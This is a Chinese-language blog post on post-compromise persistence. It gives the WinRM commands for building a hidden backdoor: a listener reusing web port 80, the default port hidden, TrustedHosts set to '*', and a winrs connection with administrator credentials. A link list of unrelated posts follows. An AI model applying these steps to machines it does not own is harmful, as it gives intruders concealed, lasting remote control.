Winrm后门在实战中的巧妙应用
winrm后门在实战中的巧妙应用
在权限维持阶段,有很多方法来做权限稳固,但是对于一台服务器来讲,我们可以利用端口复用打造隐蔽winrm后门,从而对机器进行稳定控制。
1.winrm相关介绍
winrm全称是windows remote management,Windows 远程管理 (WinRM) 是 WS 管理协议的 Microsoft 实现,WS 管理协议是一种基于简单对象访问协议 (SOAP) 的标准防火墙友好型协议,允许来自不同供应商的硬件和操作系统进行互操作。
WS 管理协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。WinRM 和智能平台管理接口 (IPMI) 以及事件收集器是 Windows 硬件管理功能的组件。
简单来说,我们可以通过winrm脚本对象,或者命令行工具远程命令来对计算机进行操作。
2.打造winrm隐蔽后门的过程
对于WinRM来说,默认端口为 5985/tcp (HTTP) 和 5986/tcp (HTTPS)
在server2012之后,WinRM都是默认开启的
(1)首先开启Winrm服务
winrm quickconfig ‐q
默认开启的,但是对于低版本如win7和server我们则需要手动进行开启,开启之后使用命令进行查询开启情况
netsh http show servicestate
我们可以看到5985(http)端口和5986(https)端口已经成功开启
到这一步就可以进行端口复用的相关操作了
首先开启80端口监听,其与现有的web服务端口不冲突
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
查询开启结果
winrm e winrm/config/listener
针对server2012以上的版本,5985端口默认开启,如果是低版本需要对端口进行隐匿,只开启80端口的监听
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
(2)后门利用
在实战中,winrm后门可以有以下利用场景
1.针对内网环境中不出网的web服务器打造隐匿后门
2.对于能够出网的web服务器利用公网打造后门,进行连接
本地利用方法如下:
# 启动winrm
winrm quickconfig ‐q
# 设置信任主机地址
winrm set winrm/config/Client @{TrustedHosts="*"}
本地需要添加对远程主机的信任
利用powershell进行添加
set-item wsman:\localhost\Client\TrustedHosts -value 192.168.80.26
这样进行连接即可
本地连接命令如下
winrs ‐r:http://url ‐u:administrator ‐p:Password [命令]
除了windows版本的winrm,还可以使用linux下evil-winrm进行远程管理windows。这里只给大家提供一种思路,详细过程就不一一展示了。通过winrm后门打造,我们可以复用其80或者443端口进行远程主机管理。
Winrm后门在实战中的巧妙应用相关推荐
- 机器学习实战中的函数学习记录
title: 机器学习实战中的函数学习记录 date: 2020-05-01 09:20:50 tags: [python函数] categories: 机器学习实战 更多内容请关注我的博客 记录机器 ...
- Mybatis-Plus实战中的几个条件构造器Wrapper用法
Mybatis-Plus实战中的几个条件构造器Wrapper用法 其实Wrapper有很多其他的方法,组合起来也是殊途同归,大家可以自己点开源码去查看一些方法的使用说明 @Testvoid conte ...
- seata 如何开启tcc事物_如何能在实战中完成分布式事务?知道这些点很重要
在这篇文章中我详细介绍了分布式事务是什么,实现分布式事务有哪些常用的方案,但是其中的东西很多是偏于理论,很多读者对其真正在实战上的使用可能还是有点差距.所以在前几次文章的更新中,我介绍了很多关于Sea ...
- mybatis insert 忽略 联合唯一索引_MySQL实战中,Insert语句的使用心得总结
提到MySQL的Insert语句,你肯定不陌生,或许已经张口就来:不就是insert into table values(xxx,xxx,xxx)嘛!没错,但在实战中,根据不同的需求场景,插入操作在语 ...
- sass笔记 - 实战中颜色的玩法总结
sass笔记 - 实战中颜色的玩法总结 这篇文章是针对自己封装UI组件库的读者的,旨在为项目提供通用的颜色方案本文需要读者拥有CSS.SASS/SCSS相关基础知识. jack lee 的 CSDN ...
- 深入理解pytorch分布式并行处理工具DDP——从工程实战中的bug说起
近期博主在使用分布式并行处理工具DDP(DistributedDataParallel)训练单目深度估计模型Featdepth(源码地址:https://github.com/sconlyshoote ...
- 43.深度解密四十三:网络营销推广实战中的“辅助营销工具”大全
网络营销推广技术.技巧深度解密(四十三)指南: 1.本文档适合零基础以及互联网营销推广工作者,主要讲解网络营销需要的相关辅助营销工具的问题. 2.原创版权文档,任何抄袭或者全部.部分模仿都是侵权行为. ...
- 第7篇:MS12-020蓝屏漏洞在实战中的巧用
Part1 前言 大家好,上期分享了一篇Shiro Oracle Padding反序列化漏洞无key的实战文章,这期讲一个MS12-020蓝屏漏洞的真实利用过程.这个案例源于2013年我在读研期间 ...
- [转载]ZT:趋势交易者的利器----MACD指标在美元指数判断与实战中的运用
原文地址:ZT:趋势交易者的利器----MACD指标在美元指数判断与实战中的运用作者:寻找翅膀的小鱼儿 趋势交易者的利器--指标之王MACD的背离在外汇市场中运用浅谈 本文是对如何运用MACD指标来操 ...
最新文章
- linux yum安装分区工具,搭建本地和网络yum源、源码编译安装软件及磁盘分区管理...
- Java基础-序列化与反序列化
- mysql 配置32g内存_MySQL性能测试 : 新的InnoDB Double Write Buffer
- java中的五种排序方法_用Java排序的五种有用方法
- LNMP实现服务器轮询负载均衡
- struts配置通配符*来匹配方法,实现动态调用
- html设置css浮点,基于宽度的HTML/CSS块浮点数变化
- OpenCV-绘制简易直方图DrawHistImg
- python操作linux命令行_python调用调用Linux命令
- Wex5打包报错的解决办法
- 多行文字内容溢出显示点点点(...)省略号
- scrapy实战之与豆瓣反爬抗争
- ios 图表_在ios应用中实现蜘蛛网图表
- 业务流程监控:让多维度监控有了灵魂
- 更改浏览器默认的网址
- 华为云桌面,一站式云上数字化创作深度解读
- 芒果改进YOLOv7系列:超越ConvNeXt结构,原创结合Conv2Former改进结构,Transformer 风格的卷积网络视觉基线模型,高效涨点
- 准备就绪的定义被认为是有害的
- 简易javascript图片轮播代码
- KT6368A蓝牙芯片调试中遇到的常见问题,以及解决的方法